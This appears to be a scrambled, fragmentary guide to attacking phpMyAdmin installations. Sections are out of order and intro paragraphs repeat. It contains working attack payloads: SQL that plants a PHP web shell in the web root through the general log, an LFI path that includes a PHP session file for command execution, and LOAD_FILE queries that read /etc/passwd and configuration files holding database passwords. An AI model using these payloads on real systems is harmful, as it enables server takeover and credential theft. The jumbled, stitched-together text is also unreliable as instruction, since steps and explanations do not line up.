phpMyAdmin HackTricks Verified

Verified: phpMyAdmin 5.1.1 leaks its version in the default CSS comment: /* v5.1.1 */.

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT "<?php system($_GET['c']); ?>"; -- This gets written to log file

If the administrator enabled the AllowNoPassword directive in config.inc.php, any database user without a password set can log in remotely. This frequently grants access to low-privilege users who can then look for local privilege escalation vectors.

Brute Force Attacks

Some setups hide it under a random or custom path, but default installations are predictable.

Exploiting phpMyAdmin: A Comprehensive Security Guide

phpMyAdmin is a widely used web-based interface for managing MySQL and MariaDB databases. Because it often holds the keys to an organization's most sensitive data, it is a frequent target for penetration testers and malicious actors alike.

If the database user has the FILE privilege and the MySQL variable secure_file_priv is empty or misconfigured, you can write a PHP web shell directly to the web root. Execute the following SQL query in the phpMyAdmin SQL tab:

phpMyAdmin is one of the most widely deployed web-based administration tools for MySQL and MariaDB databases. Because it bridges web applications and database layers, it is a high-value target for security auditors and penetration testers.

Note: This requires the MySQL variable secure_file_priv to be blank or point to the directory containing the target file.

Writing Webshells (INTO OUTFILE)

Before attempting any exploitation, you must gather data about the target instance to map out your attack surface.

Version Detection

Trigger the LFI via the vulnerable parameter to include the session file:

index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_[SESSION_ID]

Append the &cmd=id parameter to execute system commands.

Setup Script Remote Code Execution (CVE-2009-1151)

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/var/www/html/config.php');

If OUTFILE is blocked directly, create a table, insert the shell, and then export it.

B. Log File Manipulation

Look for $cfg['Servers'][$i]['password'].

If file_priv is enabled for your user, read local system files directly via SQL:

SELECT LOAD_FILE('/etc/passwd');